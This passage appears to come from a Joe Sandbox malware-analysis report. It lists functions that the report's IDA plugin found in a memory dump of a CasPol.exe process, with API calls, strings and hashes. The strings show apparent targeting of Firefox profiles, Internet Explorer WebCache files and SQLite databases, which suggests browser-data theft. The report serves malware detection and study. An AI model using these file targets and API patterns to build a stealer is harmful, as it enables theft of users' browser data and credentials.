                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                    • API String ID: 4039892925-3369679110
                                                                                                                                                                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                    • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                                                                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                                                    • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                                                                                                                                    • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                                                                                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 669240632-0
                                                                                                                                                                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                    • API String ID: 71295984-2036018995
                                                                                                                                                                                                                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                                                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                                                                                                                                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                                                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
